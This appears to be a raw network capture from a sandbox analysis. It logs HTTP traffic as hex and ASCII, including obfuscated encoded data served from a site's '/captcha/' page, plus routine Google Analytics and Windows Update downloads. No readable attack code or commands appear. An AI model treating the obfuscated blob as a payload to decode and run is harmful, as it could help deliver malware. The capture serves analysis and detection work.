136Ac1186Fc61D74cb2279d02ac01X73C22872d52436X8ce3Y92e94097XX459cF34AA1f84fA6fd54F151a7,414Y1fe66A8d4117bd766c5DF\|572C92077CX257cD32A81d82Fe3C71X8bX23990e73e95ec439AF148ad499ae5479Xe8549cH6595cGXf461b8.f66YD146bC21970C71X75CC237A1777cd2a3aD7248ccefa37A0f98
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 32 39 38 30 44 37 32 65 38 35 64 63 33 33 38 41 58 34 37 65 64 65 33 35 39 31 64 39 33 44 38 31 65 62 33 35 38 61 44 46 34 35 41 30 61 33 35 35 33 62 61 38 66 66 35 36 61 64 56 34 35 59 59 32 2c 39 36 30 59 37 7e 58 36 35 59 43 31 33 36 61 63 31 35 58 59 59 23 59 37 35 38 31 31 32 37 34 43 38 32 37 34 31 37 65 58 36 34 37 36 64 44 41 33 31 38 38 44 46 33 36 38 44 65 34 33 62 39 32 65 39 34 30 39 37 65 65 34 35 39 63 66 33 38 62 65 64 34 31 39 36 46 34 2c 41 39 37 46 41 35 30 41 44 46 35 35 35 59 32 63 66 3b 43 41 36 46 46 35 46 62 63 57 34 36 38 38 38 41 58 31 62 37 32 63 39 32 30 37 37 43 58 32 35 37 63 64 33 32 61 38 31 64 38 32 46 38 36 44 44 33 34 63 63 32 65 38 32 44 37 33 35 34 62 64 65 34 30 38 38 58 37 34 34 36 32 39 66 33 39 39 32 66 32 34 46 39 Data Ascii: 2980D72e85dc338AX47ede3591d93D81eb358aDF45A0a3553ba8ff56adV45YY2,960Y7~X65YC136ac15XYY#Y75811274C827417eX6476dDA3188DF368De43b92e94097ee459cf38bed4196F4,A97FA50ADF555Y2cf;CA6FF5FbcW46888AX1b72c92077CX257cd32a81d82F86DD34cc2e82D7354bde4088X744629f3992f24F9
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 33 66 39 36 65 64 34 34 39 59 66 32 41 36 38 41 65 31 34 65 41 35 46 43 35 33 61 61 3f 31 35 38 41 46 31 34 61 30 46 43 35 30 61 35 25 34 35 32 59 36 31 36 32 32 43 33 2a 63 36 38 62 35 31 37 37 36 37 36 32 38 48 58 37 59 64 32 32 39 38 30 64 37 32 58 38 35 44 43 33 33 38 61 65 31 33 38 44 37 32 59 38 36 44 59 33 33 39 36 59 33 46 30 35 65 62 32 34 35 61 34 59 58 58 34 35 31 61 38 66 66 35 36 41 44 4a 34 35 62 59 32 2b 39 36 30 62 37 23 58 62 63 3b 35 35 37 59 58 28 39 33 32 36 66 64 39 32 64 38 34 31 59 37 61 39 34 59 41 32 37 37 58 64 35 32 43 38 33 44 41 33 31 38 38 44 46 33 36 38 64 65 34 37 64 64 33 32 63 38 59 64 65 34 30 39 34 46 31 34 31 38 58 61 65 33 59 39 58 66 32 34 43 41 36 63 35 2b 32 35 43 46 36 32 30 41 34 43 58 35 32 37 43 64 35 66 62 36 Data Ascii: 3f96ed449Yf2A68Ae14eA5FC53aa?158AF14a0FC50a5%452Y61622C3*c68b517767628HX7Yd22980d72X85DC338ae138D72Y86DY3396Y3F05eb245a4YXX451a8ff56ADJ45bY2+960b7#Xbc;557YX(9326fd92d841Y7a94YA277Xd52C83DA3188DF368de47dd32c8Yde4094F1418Xae3Y9Xf24CA6c5+25CF620A4CX527Cd5fb6
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 35 35 41 43 3b 33 35 61 46 58 34 39 62 31 66 64 35 36 62 32 64 35 31 32 37 62 64 31 36 37 63 36 43 35 32 43 37 33 44 41 32 31 38 39 65 31 37 36 64 35 58 46 31 35 38 32 64 39 33 30 38 37 44 58 33 35 38 63 65 33 33 41 39 31 65 38 33 46 58 35 34 32 39 38 58 37 33 62 39 37 65 35 31 31 34 58 66 33 34 59 61 31 65 66 31 63 34 32 61 66 4b 36 35 64 62 34 5e 62 36 32 62 39 31 30 36 37 59 58 31 35 36 43 7b 39 36 39 62 66 31 43 32 43 62 63 25 58 37 31 63 34 31 65 38 32 39 41 64 37 36 30 44 34 31 65 38 32 44 58 33 30 34 34 38 66 32 58 38 32 65 30 34 31 38 37 58 44 33 39 38 41 64 66 40 31 34 63 58 34 34 43 39 61 58 39 34 62 36 32 61 64 35 37 39 63 52 30 35 63 36 64 51 41 35 33 59 37 7c 35 35 39 38 35 41 59 31 38 36 66 43 36 31 44 37 34 43 59 32 32 37 39 64 30 32 37 37 Data Ascii: 55AC;35aFX49b1fd56b2d5127bd167c6C52C73DA2189e176d5XF1582d93087DX358ce33A91e83FX54298X73b97e5114Xf34Ya1ef1c42afK65db4^b62b91067YX156C{969bf1C2Cbc%X71c41e829Ad760D41e82DX30448f2X82e04187XD398Adf@14cX44C9aX94b62ad579cR05c6dQA53Y7\|55985AY186fC61D74CY2279d0277
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 63 33 44 44 4d 33 37 30 63 37 31 65 37 35 63 63 32 33 37 61 64 31 38 35 36 39 43 30 31 37 38 34 44 59 33 32 38 39 58 30 33 37 38 65 58 35 34 61 44 36 33 32 38 36 44 59 33 61 38 38 58 43 34 63 35 38 58 36 33 65 61 33 65 61 66 65 59 30 39 36 50 33 35 61 59 31 4b 38 35 46 62 36 50 44 36 34 59 59 31 32 36 39 43 30 35 41 59 44 31 31 36 62 63 35 65 34 32 31 37 59 58 34 33 59 39 32 65 39 34 30 39 37 66 34 31 41 38 37 44 58 33 35 38 43 58 33 33 41 39 31 65 38 33 66 39 36 58 44 34 34 58 59 34 31 39 43 58 39 34 62 39 37 46 34 34 61 36 64 41 41 35 33 39 44 46 59 34 37 62 31 66 64 36 31 61 37 64 34 66 61 36 37 59 58 31 35 36 43 63 33 31 41 37 31 63 38 31 46 37 36 63 64 32 34 63 31 32 31 37 37 44 34 65 34 38 31 43 58 33 36 37 38 41 34 58 31 35 30 64 66 33 58 35 38 37 Data Ascii: c3DDM370c71e75cc237ad18569C01784DY3289X0378eX54aD63286DY3a88XC4c58X63ea3eafeY096P35aY1K85Fb6PD64YY1269C05AYD116bc5e4217YX43Y92e94097f41A87DX358CX33A91e83f96XD44XY419CX94b97F44a6dAA539DFY47b1fd61a7d4fa67YX156Cc31A71c81F76cd24c12177D4e481CX3678A4X150df3X587
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 38 31 64 38 32 46 38 36 64 64 33 34 38 62 65 32 33 39 39 30 65 37 33 65 39 35 58 43 34 33 58 58 34 33 38 39 58 44 34 39 39 33 66 33 34 44 39 46 43 33 5e 30 41 39 46 44 35 39 39 64 23 37 34 66 36 39 43 38 35 33 61 62 3d 34 31 44 38 36 41 43 31 39 37 30 43 37 31 65 37 35 43 43 32 33 37 61 64 31 32 38 37 66 44 36 38 41 36 65 63 35 33 32 38 39 58 30 33 37 38 65 58 35 33 63 39 33 58 41 34 31 39 38 58 46 35 37 61 64 4f 34 35 30 61 32 35 34 33 41 41 37 46 58 35 35 41 43 3a 33 35 61 62 31 21 38 35 66 62 36 47 44 36 34 62 62 31 32 36 39 43 30 36 62 43 30 47 36 36 61 63 36 31 30 37 30 43 41 31 63 34 30 37 64 32 36 37 61 44 36 31 41 38 34 63 63 58 36 34 38 41 32 46 33 37 65 64 36 32 46 34 38 62 31 64 37 34 34 39 59 46 32 34 39 41 30 46 37 34 65 61 35 66 63 35 33 41 Data Ascii: 81d82F86dd348be23990e73e95XC43XX4389XD4993f34D9FC3^0A9FD599d#74f69C853ab=41D86AC1970C71e75CC237ad1287fD68A6ec53289X0378eX53c93XA4198XF57adO450a2543AA7FX55AC:35ab1!85fb6GD64bb1269C06bC0G66ac61070CA1c407d267aD61A84ccX648A2F37ed62F48b1d7449YF249A0F74ea5fc53A
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 41 34 33 58 39 34 65 66 33 43 39 65 58 41 34 37 39 44 63 30 66 64 41 33 4a 30 35 36 61 63 66 39 34 59 41 33 64 30 3f 63 36 33 59 41 31 31 35 32 62 66 31 36 36 44 43 34 31 62 37 32 63 39 32 30 37 37 63 65 32 35 37 63 32 33 36 59 63 35 31 43 37 38 64 34 32 34 34 31 64 37 32 37 37 66 65 34 5f 31 33 65 61 35 3a 37 32 44 38 34 66 31 34 38 39 66 66 36 34 64 41 34 66 62 35 32 7e 36 58 41 34 31 41 58 7e 35 35 63 62 33 50 61 36 31 59 38 25 46 62 35 5e 39 31 34 59 37 52 62 31 39 63 62 59 31 31 58 37 35 43 43 32 33 37 41 64 31 32 38 37 66 44 36 32 64 38 34 64 62 37 35 44 38 33 35 38 35 58 32 32 41 38 58 41 30 33 33 38 46 64 62 34 31 38 62 58 41 33 39 39 39 66 36 31 33 35 30 46 30 35 32 39 41 46 39 31 58 34 34 62 31 7c 38 35 46 62 36 2a 64 36 34 59 59 31 32 36 39 43 Data Ascii: A43X94ef3C9eXA479Dc0fdA3J056acf94YA3d0?c63YA1152bf166DC41b72c92077ce257c236Yc51C78d42441d7277fe4_13ea5:72D84f1489ff64dA4fb52~6XA41AX~55cb3Pa61Y8%Fb5^914Y7Rb19cbY11X75CC237Ad1287fD62d84db75D83585X22A8XA0338Fdb418bXA3999f61350F0529AF91X44b1\|85Fb6*d64YY1269C
2025-05-21 19:48:05 UTC	580	OUT	GET /favicon.ico HTTP/1.1 host: ia-robotics.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://ia-robotics.com/captcha/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:05 UTC	371	IN	HTTP/1.1 200 OK date: Wed, 21 May 2025 19:48:05 GMT server: nginx/1.25.5 content-type: text/html; charset=UTF-8 cache-control: max-age=7200 expires: Wed, 21 May 2025 21:48:05 GMT vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== x-endurance-cache-level: 2 x-nginx-cache: WordPress x-server-cache: true x-proxy-cache: MISS content-length: 534

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	1460	OUT	POST /g/collect?v=2&tid=G-TSFRMYZ71E&gtm=45je55k0v9120684615z878295896za200zb78295896&_p=1747856878972&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101509157~103116026~103130495~103130497~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116&ptag_exp=101509157~103116026~103130498~103130500~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116&cid=1130086540.1747856883&ecid=1481710428&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&ec_mode=a&_s=1&sid=1747856882&sct=1&seg=0&dl=https%3A%2F%2Fgogocharters.com%2Flexington-charter-bus&dt=Lexington%20Charter%20Bus%20Rental%20%7C%20GOGO%20Charters%20Lexington&en=page_view&_fv=1&_nsi=1&_ss=1&tfd=6242 HTTP/1.1 host: analytics.google.com content-length: 0 sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identi
2025-05-21 19:48:04 UTC	57	OUT	Data Raw: 74 79 0d 0a 61 63 63 65 70 74 2d 6c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30 2e 39 0d 0a 70 72 69 6f 72 69 74 79 3a 20 75 3d 31 2c 20 69 0d 0a 0d 0a Data Ascii: tyaccept-language: en-US,en;q=0.9priority: u=1, i
2025-05-21 19:48:04 UTC	832	IN	HTTP/1.1 204 No Content access-control-allow-origin: https://gogocharters.com date: Wed, 21 May 2025 19:48:04 GMT pragma: no-cache expires: Fri, 01 Jan 1990 00:00:00 GMT cache-control: no-cache, no-store, must-revalidate access-control-allow-credentials: true content-type: text/plain cross-origin-resource-policy: cross-origin content-security-policy-report-only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:155:0 cross-origin-opener-policy-report-only: same-origin; report-to=ascnsrsggc:155:0 report-to: {"group":"ascnsrsggc:155:0","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:155:0"}],} server: Golfe2 content-length: 0 alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	1072	OUT	POST /g/collect?v=2&tid=G-TSFRMYZ71E&cid=1130086540.1747856883&gtm=45je55k0v9120684615z878295896za200zb78295896&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101509157~103116026~103130495~103130497~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116&ptag_exp=101509157~103116026~103130498~103130500~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116 HTTP/1.1 host: stats.g.doubleclick.net content-length: 0 sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=4, i
2025-05-21 19:48:04 UTC	832	IN	HTTP/1.1 204 No Content access-control-allow-origin: https://gogocharters.com date: Wed, 21 May 2025 19:48:04 GMT pragma: no-cache expires: Fri, 01 Jan 1990 00:00:00 GMT cache-control: no-cache, no-store, must-revalidate access-control-allow-credentials: true content-type: text/plain cross-origin-resource-policy: cross-origin content-security-policy-report-only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:122:0 cross-origin-opener-policy-report-only: same-origin; report-to=ascnsrsggc:122:0 report-to: {"group":"ascnsrsggc:122:0","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:122:0"}],} server: Golfe2 content-length: 0 alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:04 UTC	309	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YpUTyLr5k7Fb2Gl&MD=MccxyMTh HTTP/1.1 host: slscr.update.microsoft.com accept: / user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 accept-encoding: identity
2025-05-21 19:48:04 UTC	541	IN	HTTP/1.1 200 OK cache-control: no-cache pragma: no-cache content-type: application/octet-stream expires: -1 last-modified: Mon, 01 Jan 0001 00:00:00 GMT etag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" ms-correlationid: 6526e0b7-d32d-4e44-b271-85b2b301bd82 ms-requestid: 79a79fcd-25a6-4c61-b166-d9cc619a290b ms-cv: ZmBN3CqxCUq8JgJo.0 x-microsoft-slsclientcache: 2880 content-disposition: attachment; filename=environment.cab x-content-type-options: nosniff date: Wed, 21 May 2025 19:48:03 GMT content-length: 24490
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: c7 c3 8f 06 b6 24 05 3c f9 2c cb e0 99 86 1a f8 03 ca b3 04 d8 16 f0 f9 32 7f 28 14 e1 08 d8 03 b6 5f ca 00 2c ca e8 4f 1f 06 4e 31 f0 2f 3c 0e 0b 50 12 26 c4 00 85 7e 42 c0 00 c8 0f fa 0d c7 c3 a0 90 23 e5 21 63 33 1e a7 e6 2a f9 c3 ee 4b 69 ce 94 9b 68 c7 7b df ba c7 eb c3 55 b3 50 05 c8 b4 a7 ea a2 5e 5e cd 3a a2 aa 75 43 4b 97 f4 bd 25 ec 55 81 8f 48 6a d4 2b fb 61 52 86 d0 3b 01 14 b0 69 f4 31 7a b6 35 59 f1 51 9b 07 06 22 e9 3b 54 1f 1c 09 53 6c 08 99 9d 74 59 32 ad 33 42 5a f5 2c 05 bf b7 e9 cf 8f 5d 2c 89 c9 8a 5f 6c 65 4c 0c 6d 6a 3f 83 6c b8 bf a3 10 39 92 ad fd bc d8 94 f7 ca 6b ef 90 4b eb 87 76 34 1d 50 f6 0b 7d 4a 62 19 4b 92 ae d4 3f 79 3c 37 e1 2d 6c bc f7 fc 95 94 bd 9c f5 56 86 da 39 b9 b3 67 4c 1a 17 d4 27 59 97 fa bb 03 e7 1b 32 9c 5f Data Ascii: $<,2(_,ON1/<P&~B#!c3*Kih{UP^^:uCK%UHj+aR;i1z5YQ";TSltY23BZ,],_leLmj?l9kKv4P}JbK?y<7-lV9gL'Y2_
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 99 5f f0 57 d3 49 7b b2 e4 e5 c0 9e f2 e2 b5 17 92 26 2b c1 a3 c2 60 60 5d 36 2c de 60 61 ea e8 98 df 55 7a a8 91 e4 a9 84 e0 3b 6e 95 89 91 fc a7 0f 95 af 35 36 d1 a7 99 9e 88 5e 1c 90 6f 76 55 35 c9 a6 7b 9c 57 31 1c 7d 98 8c a5 d0 5c 66 01 23 08 79 a0 ac fd 28 e3 66 c4 5d bc 06 ed c2 ac 2e 85 85 1d 2c f9 63 f9 ae 62 0a e0 dc fd 65 e4 07 da 27 83 27 db 54 2f 30 4f ab 57 35 d0 e3 25 bc 3a 8a 0f 18 ab 06 65 1d c3 c6 d7 dc 20 e5 92 42 df 59 3a dd 99 b4 1e 33 04 f5 9c 31 69 0f ec 13 9b b8 7c 93 51 3a 5b 90 33 78 d9 c2 f9 a0 e5 54 1d b7 41 12 7c ea 48 f9 8b 32 9d cb 22 59 19 02 65 dd 61 fc 1e b6 2d 6d 85 1b 49 c9 9e 9d a6 e3 15 82 bd e8 4e 07 0a 96 41 09 6c 7a 91 fe 23 c6 ec 81 c3 34 b3 bc bd 6d 1b a2 f9 9d 9a 55 ad 27 0b b3 da 0d 82 7c 98 8d 2d 3b d6 c6 13 Data Ascii: _WI{&+``]6,`aUz;n56^ovU5{W1}\f#y(f].,cbe''T/0OW5%:e BY:31i\|Q:[3xTA\|H2"Yea-mINAlz#4mU'\|-;
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 2d 5f d0 00 d0 07 f4 72 f6 e6 e8 44 69 fd 25 5f 10 dc 3f 70 f7 40 41 25 f8 69 80 38 20 27 0e a0 36 fd 40 ab 6d 7e e0 7e 60 1f a0 bb cd 0f 54 fd d7 fc c0 df e9 fb c7 c8 07 c3 96 47 48 09 90 7f f5 08 49 7f e5 05 82 72 c3 a4 de 98 91 55 c3 ea 10 ce a3 13 c3 f7 12 97 f6 c4 ce d7 c2 d9 28 f3 83 ce ec 99 14 4b d4 be 03 9e 48 26 e8 06 e4 1c e3 a4 41 09 dd e2 d3 84 db 86 e8 d2 f6 fb 0d f2 bb 63 cb fd 6b 48 cc 83 a9 85 16 0a 62 17 34 a2 dc b2 5c 8e 5a 11 11 25 46 bc 99 aa 15 3b c9 46 0f 5f 5e b9 9a fd a8 03 36 50 d9 0b 10 d7 86 2a ed 8c d3 6e 1f ed e9 f0 96 84 f7 3b dc 1d 9e 09 6e c5 df da 17 74 23 13 af d2 ac 85 dd 4d 74 ea 15 fd 52 cf 64 7f b7 fa f3 19 03 d1 3c 1d f9 9e 49 c6 ae 97 08 66 b1 ba 94 91 c7 2a c7 ee c7 ef 55 45 e4 5e a7 ed 2e 5d 46 59 44 0d 4b 8d 93 Data Ascii: -_rDi%_?p@A%i8 '6@m~~`TGHIrU(KH&AckHb4\Z%F;F_^6Pn;nt#MtRd<IfUE^.]FYDK
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: f4 d2 5b 0d c4 46 f4 08 0d 64 b7 dd 0e 23 c4 4a be c6 2c 08 e4 15 96 43 0e 90 12 6e 83 93 e4 22 73 bf 9c 43 a3 72 7e 18 32 1c 87 83 10 55 1d 3d 13 70 78 a0 df ea 3e bc 8f 9c f3 c9 cd b2 63 9f 56 68 27 2f ce f2 f7 d1 be 1e 37 ef db 07 4d 38 19 d3 72 07 4b 21 bd e4 5a 22 2f df 9c d9 42 cd 28 ce 46 7d 02 5e c0 3a 7d 59 8f ba 2b d9 8a 6a ee ee 00 2f 1d b9 28 fd 40 78 e3 bc e0 27 36 dd fd 43 d9 6a 3e 0d 73 ca 91 ee 0f 3d a6 1a b5 25 8c d1 15 8a d7 f8 93 2e 54 ac df 56 e1 7f ed 19 54 17 27 34 90 14 e3 70 8c 6c 7f ff 7e 4f 51 14 1e 4e 05 72 47 b2 4d 89 4e f9 67 77 f4 77 a9 eb f6 50 12 1e aa 0b b0 6d 8f 25 51 7d 17 52 f8 55 b8 68 f5 90 ab 07 5f 36 1f f1 e4 1e e5 fb f3 73 97 9a e6 1d ab bb ee b9 59 5a f2 3c e8 6d 9f be 51 7b 02 c0 7d d8 d6 01 4c 12 85 7b 05 e0 5e Data Ascii: [Fd#J,Cn"sCr~2U=px>cVh'/7M8rK!Z"/B(F}^:}Y+j/(@x'6Cj>s=%.TVT'4pl~OQNrGMNgwwPm%Q}RUh_6sYZ<mQ{}L{^
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 17 7a 50 e3 3d 37 50 78 c6 9b 00 9e b1 6c 93 1f 64 fc 47 28 e5 6f 7b 2c 3f 66 9c 1b c0 91 91 7f f1 eb 59 11 28 38 61 06 ff bf 92 d0 14 5f 4d 0f e8 d9 e9 00 5a 30 6e 48 2f 23 03 13 4d 57 f0 f8 e5 8d 51 9b 88 0d f9 1d 57 58 98 cf e8 0b 8c f6 eb 9c da ff e4 4a 13 15 29 0c 69 75 94 79 e3 95 50 e5 48 e0 90 99 54 fe c5 90 26 13 97 27 85 89 ed 99 b4 32 69 b3 23 07 e3 9e fb e7 e2 e9 27 ff d9 3c 6e 78 48 c3 3d 4c b0 78 83 47 97 43 99 4b fa 65 6a 2b a5 20 16 23 d3 dd e2 46 1d 6b 79 16 e2 7b e7 3e e7 71 eb 7f c8 e3 4a 49 a0 64 7e e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 7f e6 71 ff ab f3 b8 5d a3 0e 92 5e 1d d9 33 07 9d b4 5a 5b 1f 36 94 07 fb 31 44 46 72 24 1d af 77 ba 94 e6 6b df 96 Data Ascii: zP=7PxldG(o{,?fY(8a_MZ0nH/#MWQWXJ)iuyPHT&'2i#'<nxH=LxGCKej+ #Fky{>qJId~qqqqqqqqqqqqqqq]^3Z[61DFr$wk
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 72 61 74 69 6f 6e 73 20 50 75 65 72 74 6f 20 52 69 63 6f 31 16 30 14 06 03 55 04 05 13 0d 32 33 30 38 32 39 2b 34 35 34 32 33 37 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ad 94 76 8f 83 ad 0e 03 a3 e8 3b b0 d7 34 68 d4 79 3a 7d dc 30 60 06 03 55 1d 1f 04 59 30 57 30 55 a0 53 a0 51 86 4f 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 72 6c 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 70 64 61 74 65 25 32 30 53 69 67 6e 69 6e 67 25 32 30 43 41 25 32 30 32 2e 31 2e 63 72 6c 30 6d 06 08 2b 06 01 05 05 07 01 01 04 61 30 5f 30 5d 06 08 2b 06 01 05 05 07 30 02 86 51 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 6f 70 73 2f 63 65 72 74 73 2f 4d 69 63 72 6f 73 6f 66 74 25 32 30 55 Data Ascii: rations Puerto Rico10U230829+4542370U#0v;4hy:}0`UY0W0USQOhttp://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl0m+a0_0]+0Qhttp://www.microsoft.com/pkiops/certs/Microsoft%20U
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 6c d5 21 c9 b8 50 68 05 c3 e4 09 c9 bd 51 c9 5f 6d 75 4f 8d 35 30 c5 8c c1 83 b2 1f 93 b5 72 6f d2 44 90 1d ed 7f 13 a9 7d 53 24 9c aa 46 c0 8f c5 c5 be bf c8 55 14 fe 87 35 fe cd d5 7e 02 d2 87 68 00 c9 b8 d7 44 cb 71 db a4 8b b3 e0 0e a6 0b ce 12 7d f6 68 dc c0 91 31 f8 59 2c 2c f5 d5 d1 2e 08 9d 2b 30 6a 6e aa ad 9e 16 4e 27 d0 ba 3b 1a 81 30 43 38 92 87 e1 6c 6f 43 3d 2d 4e 1f 0d 10 c1 f8 fa bc 84 c8 93 c3 9e 47 fc b6 fa d1 2f b6 af 39 3e 9c 3f 1c f1 4d a4 16 d3 0a e2 e7 4e f5 37 88 03 46 8e 1e cc 77 c1 47 d3 44 b7 e4 35 23 db eb 20 cb 2a f5 57 ae 2e 00 3b 6b e6 a3 6e 05 99 70 bb 76 3b d8 3c b4 76 f6 28 15 3a 25 d4 26 a4 08 9f d9 7e 7b 44 8a b7 15 8a c6 c5 78 2a 9d 32 c4 83 7b b9 6e 42 14 99 5d 49 7f 45 99 57 a7 33 77 44 1a ff 47 a3 71 b7 b0 b1 56 8a Data Ascii: l!PhQ_muO50roD}S$FU5~hDq}h1Y,,.+0jnN';0C8loC=-NG/9>?MN7FwGD5# W.;knpv;<v(:%&~{Dx2{nB]IEW3wDGqV
2025-05-21 19:48:04 UTC	1460	IN	Data Raw: 42 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 34 30 32 a0 14 80 12 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 a1 1a 80 18 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 3d cd 0e 0a 7b 43 82 69 14 76 9b c2 1b 25 6c 3f 01 d0 b8 bb 6f e9 4d 62 55 f3 7a 5b c4 05 04 2e 09 48 41 fd e9 13 24 1e f0 71 f0 79 9e 8e a7 ea d7 72 49 9f 71 e8 41 4c 0a 8e 69 71 3c 8f e9 56 c5 9d a0 e6 3c df 48 88 1c cf 7f eb a0 34 f3 ff 37 ca 6d 9f c7 86 eb 12 35 0a 45 a5 81 a8 f8 53 6d c6 11 4e ef 37 77 2a 73 bf 08 f9 ee ba 8d b8 48 1a 93 32 44 3a cd 7c 41 2d e3 20 7e 34 a2 7c 2b 93 92 2f 0a 5f 17 c8 65 98 79 74 bb e7 1c 1a e2 6c a4 15 db cf ae 5b 18 f9 9a 82 ab 98 f5 13 93 f3 0f 89 71 a4 2f c0 7e Data Ascii: B+71402Microsofthttp://www.microsoft.com0H={Civ%l?oMbUz[.HA$qyrIqALiq<V<H47m5ESmN7wsH2D:\|A- ~4\|+/_eytl[q/~
